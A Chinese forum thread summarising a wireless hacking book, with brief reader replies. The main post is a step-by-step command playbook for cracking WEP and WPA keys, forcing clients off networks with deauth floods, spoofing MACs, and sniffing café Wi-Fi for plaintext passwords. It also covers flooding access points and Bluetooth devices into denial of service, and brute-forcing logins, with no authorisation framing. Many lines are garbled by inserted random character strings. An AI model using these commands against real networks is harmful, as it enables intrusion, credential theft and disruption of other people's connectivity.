查看: 11074|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3720

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。& Z2 J/ F9 @+ i" O9 c" l

2 L; r  t" B) T: d( c以下所有操作均在BackTrack 4中进行。
" E3 q3 C" d$ ~2 a; J- r# o7 ?2 O
2 g/ _, u/ N9 D2 [
, w% ~# ^) J! I' e+ l& D6 k无线WEP加密P解:
7 J) Z& h" X. n/ W# b! a0 D" e4 O" D* m2 A& @' N
注入P解:
3 j; ^& ^% \: ]/ N$ s: L* y4 ^. J2 n% D2 H9 X
ifconfig
- h, e0 ]5 q' M) ~8 N+ `0 X+ T4 e3 N7 E
ifconfig –a$ q) f9 Y  l$ o: S- M& N6 y

" v3 @5 ~1 E' g7 A) _& ~ifconfig wlan0(无线网卡) up! q; \6 ^# Z# f4 x# A& z

* X. Y& ~- C  C$ k: h* C( Y" Xairmon-ng start wlan0( b- C3 V- ~: M; X& T
8 o7 Z; _5 E, u4 v9 r( n
airodump-ng mon04 d' H2 J' [+ m% d
+ }% m1 Z( P  |
airodump-ng --ivs –w ivsfile –c 频道 mon0或
$ D- R, _; P0 I0 T* Z
5 J0 Y3 ~; ?( z. F! o( w* fairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0( C2 k/ A2 F" k5 h4 U1 L

6 ~: U1 e& m. q. _, L$ zaireplay-ng -3 –b BSSID –h Station mon04 m# d$ ]  \' }* M4 P# `  D0 _2 V+ o

2 f( g& g, n3 ^' w( N. \aircrack-ng ivsfile-01.ivs* W. k* w+ o# B' u' t

# g: z) ~! M9 M6 [4 {- z: q+ U% Y虚连接P解(适用于无客户端连接APP解)
4 `- R6 i# p/ d  g6 K! k
2 D5 z5 `( @3 Y. v( R8 oifconfig) x6 {/ d. @2 h3 l3 j# U% _+ G

! @' |" |1 s8 K" `; Gifconfig –a
7 w3 t) ?/ ?% k5 q* }, u! ]% ^2 c3 T8 s8 p& ?$ o( Q( ^: ^: h* ?
ifconfig wlan0(无线网卡) up
# _& e- J7 f# t; z% `5 b* x2 R+ |3 O; W" Z  I
airmon-ng start wlan0
3 {" {) i7 S& N; P, b1 i, i/ S' ^. A, o2 x
airodump-ng mon0. ?# g/ ^; W0 u0 n* C6 v

$ P: V2 [. a8 D. x. P3 {airodump-ng --ivs –w ivsfile –c 频道 mon0或: @. R) G0 k; {6 a0 k7 U) J

- T" e+ ]$ u3 J1 O7 K; Xairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon00 y+ m  Z4 ~  p; E7 _
# q" G- \% \, c- f& o( J
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0! |; u8 k# z; B2 _4 \! Z

$ W4 V5 D8 f6 t+ c- Qaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon03 s" L( u$ E& ^7 D4 ?8 a8 @

+ w; E. @; O$ H) n! e0 D! i. saircrack-ng ivsfile-01.ivs0 r' |' \" u, t" {

$ D+ `0 x+ `! B" F- @0 L/ ^1 C
( J( w0 @1 R" c1 {还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。: D' v% c& `9 \
! o; b* A4 g6 L4 c  f+ d

9 v4 y' a1 u, U% JWPA-PSKP解5 ?+ E7 c1 P3 w+ F7 @
& w& P; X% j2 A
ifconfig% Y6 @# S+ d) W! C) n

" S' [) f7 C" {ifconfig –a
$ m5 Q7 }+ {; G( T, |$ ]. G/ l/ G  l2 f  Z
ifconfig wlan0(无线网卡) up8 Y: P% O/ z9 K5 d9 \
7 ~. a6 z" y* r9 ]/ X% I
airmon-ng start wlan0! q+ r. W4 `5 p4 _, v/ a; h
! E9 |: T2 U" {
airodump-ng mon0' }" Q  r- [, p
0 t) D* e8 r3 `" c
airodump-ng –w capfile –c 频道 mon03 I) Q; s! _0 r+ P: Y9 \
& v' T/ E9 @7 W) e1 h/ b
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
" R8 W. u3 {0 A9 O
3 N. a& k8 h  z/ S' kaircrack-ng –w Dic capfile-01.cap或
% d5 x$ T$ u9 w# o
1 W* |8 I7 z! Y  O9 d$ icowpatty –f Dic –r capfile-01.cap –s SSID
# T+ g" A+ X2 T8 H6 t
  y8 `" \9 W8 g" A- Ecowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
. H( E- n: X! \; x4 H2 x- e
  |' g* q( P' G5 _5 A傻瓜式P解软件SpoonWPA。' `0 Q6 W+ u# f* P8 c0 S+ z
. U; P  T. i8 @2 C
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst6 ~; C/ G4 B# c+ O4 m
- |. x* }+ t: P4 V+ m; ~- p! }+ K
; \/ I5 E' U2 V7 M
字典文件的生成和上传  ^! }) ^! O8 m, c: G; I; d
" {" T5 B) u8 n5 l, q
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。/ p% G: y! q3 a6 i! B; b
! t7 O1 j! n$ |3 Z; P1 R
5 k1 `, T! i% U4 L! D
BT4下开启Tftp:Services—TFTPD—start TFTPD) N$ Q" f( n% Z2 i# r7 E) P% Y

/ A  {/ _) j, W& @% O# p' d在Windows的CMD中运行 tftp –i IP put **.dic- L$ p( V6 j- C* t2 {7 C  }- n) n
$ j9 P+ q* ]+ Y) e* U% d: L6 `

; w$ d3 F  M! |( N8 \) VBT4下开启SSH:Services—SSH—start SSH4 R1 m. t; }, D2 d
( e! M$ g# h* C* B) o  C3 o% [
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
0 W2 m+ u: q" n: z! R. ?. K: l* Q, @* h& j- x) x. l3 |$ q1 R
7 V1 O$ |  S7 ~2 u! E6 L
AP限制MAC时的解决* f+ E( |' U% X$ M
# z' ~& S  N+ Z5 M" ~) r
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:, @* E  @# A5 X3 W, U

9 f: Q6 ^; ]. v( B1 O/ G, K8 Sifconfig wlan0 hw ether NewMAC
, q9 k0 f& b  T1 k) B8 h
+ T  }+ ]$ ?1 L5 H; D8 W- {% L; Q" {* b9 S: H
关闭SSID广播的AP探测:
5 Z* ^( a, D3 w* c
& T$ ~, o( m* X0 H$ F6 Z1.     Deauth攻击:
$ I9 m- F$ Y# V: e
" k0 i( b* z( y& d: R2 L/ wairodump-ng mon03 _* [- x- ?  z3 }1 y* B4 F

# a: T5 ], v: n+ K; U- aaireplay-ng -0 10 –a BSSID –h Station mon0
1 [% [8 s7 G' L* r+ m
; C, Y2 [* A% ?  ]4 `7 @2 A* g& h2.     抓包分析1 x% _2 Z4 O) k
5 h- ?. E2 r8 S4 {- U; Z0 a
Omnipeek1 W; H: t7 }/ |, D1 P; s

# Z8 w7 o% n; i0 ]7 sTcpdump –n –e –vvv –i 网卡名5 O' X, p. s- n+ u/ M0 u7 b2 n
( O: A5 z" A/ C- p
3.     暴力P解, I2 |. N/ f0 w

3 ?8 o* y% F7 F! q4 r# r$ h0 UCharon 1.1暴力P解
- e- P! c7 J0 U; S
& L$ J: l; X. ^7 f  w8 A' r, D4 w
9 \) N, F3 O9 T1 w% o) i无线加密数据包的解密
0 n; P$ G! a  q  [+ b% G- K6 A; K! a& \* d6 K+ Q% V( \+ h1 R: I
- A  D3 R( ?# _% o1 c. B4 E
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
, b9 p( K9 c) _6 P0 E
+ S+ f) u. O- L+ _8 K0 {; [6 Y% pFilterNS     DNS解析数据包5 M- a2 f0 m1 F9 s9 L

% v: U) K  K2 q4 F4 V( oFilter:HTTP    WEB访问数据包
) n" F$ w+ y& {6 ^  A1 X5 w' k* r
/ |8 ^( ?1 t" a3 O. EFilter:msnms   MSN. j9 G8 a7 g, J
* Y. n% l2 I( s: ~3 M6 W) D
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。* D5 ^5 e8 Z1 e; o7 p6 M! y
" A/ E0 n# q2 R8 Q) |* e" O
使用airdecap-ng解密:
& A2 A$ o2 {/ \7 ^+ S! G- B( v4 N) U* l, w+ A( m# Z0 [0 z
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
7 o/ L2 [  m6 ~" c6 ]0 z: N% c8 ?. s

( z7 N1 R; v) J  E' g+ p* \咖啡馆中无线数据截取(开放式无加密AP)
+ T2 K6 s* ?2 |( B3 M$ v0 l3 N1 h! I2 r  O
1.Airodump-ng –w data –c频道 mon0
1 `; `* k9 m2 q7 H) B  H
: i. G6 B6 N( Q2.使用WireShark打开分析2 H& U& i, b7 @" d  P* H
' I4 E8 m- `7 G  ^

" g" Z( |) O% ?1 L; r- P9 UBT4下的渗透工具:0 Y6 O3 z9 k9 M4 \! t- {
" N+ F5 D( ]9 w: i+ j- L
nmap –sP IP/24        判断C段下存活的主机
7 A, h; h. E" q8 h& [" I2 ?; S  y/ y2 q- S9 q9 l( A, A: v
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放+ d. c4 E5 J3 ]/ ?

( U% \6 i7 C% ^) l. hnmap –vv –sV IP –p port   指定端口的详细信息。。。0 n1 r/ E1 i/ e6 y$ @8 E
4 J1 K. L6 J6 d, [2 h$ g' j: `
namp –O IP/24    判断主机的系统版本% F6 e( a* y, L6 j3 v+ S$ e
2 k( K5 q) X) F) Z# h  ^& \" y
1 u8 P, k2 y/ c1 E9 N
GUI 版nmap:Zenmap   Y( U, u8 u7 e: E, n! k# D0 M! _

5 @/ f2 `8 d% ?1 k2 k: k
4 x( k6 A! R/ `/ |4 t& h3 l% BAmap使用:amap –B IP port1 F3 B& [& u: m  R0 T' C1 e9 N

( ~6 h* y. x) ], K  ^' H: _Nbtscan(扫描Windows网络NetBios信息):8 j& j/ S8 u6 i, }* X) S

) w& I2 z& y& d! P1 hnbtscan –v –s : IP/24" l- n2 \/ k! M$ y$ ]0 f' F

& h9 @% f0 b6 gnbtscan –r IP2 i0 a, [/ j* U0 V7 Q

7 S* `, J8 X6 v- u' A, ^# @
- T# }$ g1 l& D2 F& Z; VDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.$ v4 i* R' N3 q! R* _
9 Y. p% i9 h; C0 c- F' p
* J# [+ @5 h3 I; g! R% z
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
6 |. f8 h( n, U' ?0 ~2 d# ^. p( }; X. S+ l" ?
BruteSSH: ./bruthe.py –h IP –u Username –d Dic. a8 e1 Y' P& Y9 {* Q% I
7 z7 P9 V8 B& S% Q% K
Metasploit3使用
* x+ Z/ F" k% x/ X, b+ K无线D.0.S
+ Z! n2 i; o4 e" K- x( S/ C: A4 R2 d+ S9 O8 [

& [0 ?  O8 K$ c/ [Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
! P/ Q: F3 A* a# M- Q7 ]
; w% G* f% n) k4 Z" f1 I& kairmon-ng start wlan0
: a7 I1 f. ^# d( V- G2 w3 A
/ s' l% i* H, Tairodump-ng mon02 V9 D, O; |% M% O2 k
1 j# `5 t9 P' Q0 \5 |
mdk3 mon0 a –a BSSID
0 K) G: }5 R1 q7 o! u) @$ M6 G4 t2 `3 v( z
对所有的AP攻击:mdk3 mon0 a( u% V) X; K2 s+ i' G/ q3 M1 u& B

+ Y! s6 M1 q3 w, u. c! O& e
0 Z: `5 ?9 B% c: dDeauth Flood 攻击' F8 w7 V' K/ @! K; k5 b0 N
- A# l5 i2 H9 A6 a- {
mdk3 mon0 d –c Channel' K( P# C: L) A( j' f1 A

" p% N; \5 V$ _6 I# M图形化D.O.S攻击:Charon% c- e& ?9 l  V% @+ N
1 s4 P4 K+ E/ d0 Y8 q5 E
  L& Y$ d$ a) ^4 L
当受到攻击时,使用Wireshark抓包可以看到异常信息。0 w) q5 v4 d9 `1 ~5 a- d5 D4 O2 \$ I
$ h3 h4 u* q! `8 x( g: w* b

6 D8 J. F  r( U; F8 a; KWPA-PSK高速P解$ L1 K* ~1 y) s, y% \2 N

' I7 y& q: w3 s4 W. ^* k6 [1.       WPA-PSK PMK Hash TablesP解
' G4 H% F; d8 b( F2 [
5 o. D6 {5 c+ FCowpatty –d HashTable.hash –r ***.cap –s SSID
* Q: \2 c9 y3 }$ a# i2 I
. V+ i( }, S& R2 M) D5 hHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
6 {/ M" U! v/ D& ?( K3 q+ T& R( L3 O
2.       GPU辅助高速P解
2 M( c( d" q' {
$ _1 {$ I+ W* l3 y9 _: f, p使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。! }* S$ w5 |& \# u9 ]! \
3 u6 r5 w9 I' d# {* ?
3.       分布式P解& i) [- W3 N5 `
6 q% V4 h' R) u. o; D6 i
2 q$ r  Y" v- h% Y
AP的伪造
9 F, s: q& T# R& @4 F1 r& H" C$ Z" |( o! k
把AP的MAC改成目标AP的MAC
% U9 q7 B. S: C# [
# {4 V+ I- x0 o网卡软AP- ^6 }/ k% ]% l5 C) A
0 X$ u! p. C/ a' ?. g
2 G4 a/ |0 M8 i  L& h
伪造大量虚假AP信号:9 C% ?, A1 o- [" A
9 i. ?$ ~$ i$ `6 J
随机SSID:mdk3 mon0 b –g –c 频道
2 Z- Y$ t' ]  b7 A4 I0 b  E7 y8 Z
0 Y& ~" h; |& Y$ I. S指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
" i# v* ?2 E7 ]" N& z$ F! h& f3 M$ F$ l" k
; r6 f8 B5 q9 d- w# Q
War-Driving1 H- E' e+ _6 }  s! }- q

4 R9 c* ^8 k4 h+ Q! F热点地图绘制) ^' r+ z( l% F6 |8 I  g
% S8 T% _2 h6 ~+ g# L# `3 a6 S3 o
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
9 L4 f6 g' N; b1 b: O- }1 T, r) E8 n3 S* ^+ d
! t) J* C/ f" g0 n
Netstumble
5 f8 ^$ t8 `( l8 ]2 n" o, u0 r  \, x+ n- j

/ a8 o) y( @% J3 O: q: L6 c# \8 W蓝牙Hacking7 f$ B" _2 V* H6 z3 ^1 O& w
' g& [# h1 t( K1 I+ l; [* e5 G
Windows下的Blue Soleil工具
5 b# X% r# \( _3 \4 b) S+ U
. {+ U9 S4 X2 b/ O5 I0 SBT4:7 t2 L6 l* d* E1 _# H7 B
. {' X! ^9 `7 R
hciconfig 查看蓝牙适配器
" y  I& I; t* F
7 r; z8 ]. f3 E( d7 K8 }0 e: phciconfig hci0 up 载入蓝牙适配器
6 A/ w+ z) o1 _1 ^  m1 Z& u4 `2 p" M/ r0 _
hciconfig hci0 class 蓝牙适配器详细信息  g3 T, r; j1 R/ W+ ]

( z; P1 N# Z# d3 n' ]0 Q& v7 c9 j/ y  r
hcitool(扫描蓝牙)
3 {; X$ C+ P* `7 m/ l, u7 m# ^) A9 L+ m
hcitool –i hci0 scan
8 l7 O( u' K7 r, S4 ?7 x' m6 W  S9 b0 h/ l& Q  W/ Y$ a
BTscanner(扫描蓝牙)4 R1 H9 z6 ^2 G

) k3 P% ?& O& u  ], [0 j
+ @  s- Z5 v7 Y% D8 {& N蓝牙攻击:; F3 ~) Q* m: [2 d% |
5 t' }. U( S' `/ q
BlueBugging (适用于BlueTooth V1.1的手机)6 y# {" l; V5 ?+ o9 D  x& U5 h0 k8 S% I; M# T
/ F$ k5 }8 W3 u% Y* O" o
Bluebugger工具:
. f) V. {% O% L& ^7 N' R* c+ ?+ Q# U, Z* @% U
Bulebugger –a HD_Addr info+ ^; l+ P% j: f. o) \+ N7 F. M3 ?

# P) `1 m1 U) \! y" b, L
0 x8 M8 r( h5 k- J8 KBlueJacking/ g- @3 N9 ?8 ]  V+ I' G, W! s

" M: h2 C' T1 G9 f( O$ o7 G5 P: g* _实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
& |' m* d* W# W9 T- C& J( M6 |) G* l1 H) N1 Z/ X: w" V

4 o4 o( \0 }% t# o1 Z' XHD_Addr修改:
" A4 [: n) X; R8 W8 Z
, P% O- M% _' N2 ^. j( hBdaddr工具
$ d  W" `( M0 e: m4 @) `. O6 }9 x5 a: l
bdaddr –i 蓝牙设备名 新HD_addr" j' F. e) g: l6 y
/ b/ R% e1 w: j9 I
/ o' B7 G& z5 s1 e$ D
蓝牙D.O.S' l. X5 r" ^8 g1 F+ C* w7 L- s/ R

+ t- B& L. K8 [! [9 b; Al2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务) K8 H& ?5 |7 z

) Z( O1 R, J# f# r2 X3 d, {+ ^) ^hciconfig
' j& ^! _( H5 F' M& s% O
- v! {( T1 _+ X* z- U8 J+ ohciconfig hci0 up
% @& ]4 W) @+ d4 B  p- N" M+ ]
/ ]+ `% X+ O7 _2 k2 T% Ahcitool –i hci0 scan
  z( l+ s- \+ Z  O0 r( t6 L0 w* S/ U( A% F
l2ping –s 10000 –目标MAC; t' b. L0 T: i# H  y1 ]+ ]
' l6 B; B% _5 }9 Z! D/ h2 `
6 _. G: ?) F3 A* g1 C4 N  M
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
5 }% R- d# v: }( V1 c5 r7 L% Q$ I$ ]+ o4 y$ t" ]% U( Q2 C) T
./fang –r ************-############ -s4 ]3 o. w* |. M! c

2 B. l4 y8 l: [+ F, K0 A" r暴力P解************-############的蓝牙设备
! ?) I( D0 d: B9 B) v! o  i$ l/ J* ^: j: ?2 G
./fang –l 各厂商BD_Addr分配
: Z3 \1 L- j& Z2 m
. H! M' Q8 v$ Y; v
1 s1 h/ ]0 G/ CWifiZoo使用; E5 t0 u2 U& Y. N' V
" A0 J& t* c( U: G4 Q5 _9 x
./wifizoo.py –c Capfile& Q# t* x2 p+ w9 B: _: l$ v! ], h

" u0 ^; s0 y$ E+ c访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

141

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

940

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。8 N/ f& p6 q3 H! L2 o
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的- F/ y, V, ]8 t( G
呵呵 其实也不贵 21块 快递再一点
( D# c7 M5 [. ]3 g2 B/ X我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

关闭

站长推荐 上一条 /1 下一条

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图

GMT+8, 2017-8-19 06:02

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表